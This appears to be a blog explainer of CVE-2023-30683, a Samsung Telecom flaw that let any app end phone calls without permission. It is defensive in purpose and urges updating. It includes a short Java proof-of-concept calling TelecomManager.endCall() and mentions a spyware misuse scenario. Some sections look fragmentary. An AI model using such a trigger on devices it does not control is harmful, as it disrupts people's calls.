In August 2023, Samsung patched a serious vulnerability in its Telecom component: CVE-2023-30683. This bug might sound technical, but here’s the simple version: due to improper access controls, any app on your Samsung device could hang up your phone calls—without needing the usual permissions. This could lead to annoying call drops, privacy issues, or as part of a bigger attack. Let’s dig into what happened, how it worked, and what developers—and users—should know.

Vulnerability: Improper access control in the Telecom framework on Samsung Android devices.

- Affected: Devices running firmware prior to the August 2023 Security Maintenance Release (SMR).
- Impact: Local, unprivileged apps could invoke the endCall API without holding the necessary permission, causing ongoing calls to end.

Reference:
- Samsung Security Bulletin - CVE-2023-30683

What is the endCall API?

In Android, the Telecom framework manages phone calls. The method endCall() (in android.telecom.TelecomManager) is used to end an ongoing call. Normally, your app must hold the android.permission.ANSWER_PHONE_CALLS or have privileged system-level clearance to use this function.

The Bug

On vulnerable Samsung devices, the Telecom service did not properly check if the app calling endCall() held the correct permission. That meant any installed app, even those without phone permissions, could hang up calls.

Here’s a simple, step-by-step test app (for educational use only) that demonstrates the bug

WARNING:
Never use exploits on devices you do not own or have permission to test.

import android.content.Context;
import android.telecom.TelecomManager;
import android.os.Bundle;

public class EndCallExploit {
    public static void main(Context context) {
        TelecomManager tm = (TelecomManager) context.getSystemService(Context.TELECOM_SERVICE);
        if (tm != null) {
            // This should throw a SecurityException if unprivileged,
            // but on affected Samsung devices, it works!
            tm.endCall();
        }
    }
}

Spyware: To avoid being overheard, spyware could instantly end calls if the mic is in use.

_Note: There are no known public attacks in the wild before disclosure, but the ease of exploitation makes this a high-risk bug._

Update your Samsung device: Make sure you are on the August 2023 SMR or newer.

- Check for Samsung updates

Technical References

- Samsung Mobile Security: CVE-2023-30683
- NVD entry for CVE-2023-30683
- Android TelecomManager API docs)

Summary

CVE-2023-30683 is a critical but easy-to-understand vulnerability: any app on an affected Samsung phone could hang up your calls, no special permissions needed. Samsung patched it in August 2023—so update your phone! If you’re a developer, always double-check permission enforcement when exposing sensitive APIs.

Still worried? Want to see if you’re vulnerable? Use the sample code above—but responsibly.

Stay safe, update fast, and keep an eye on what your apps can do.


Author:


Date:

Timeline

Published on: 08/10/2023 02:15:00 UTC
Last modified on: 08/14/2023 16:12:00 UTC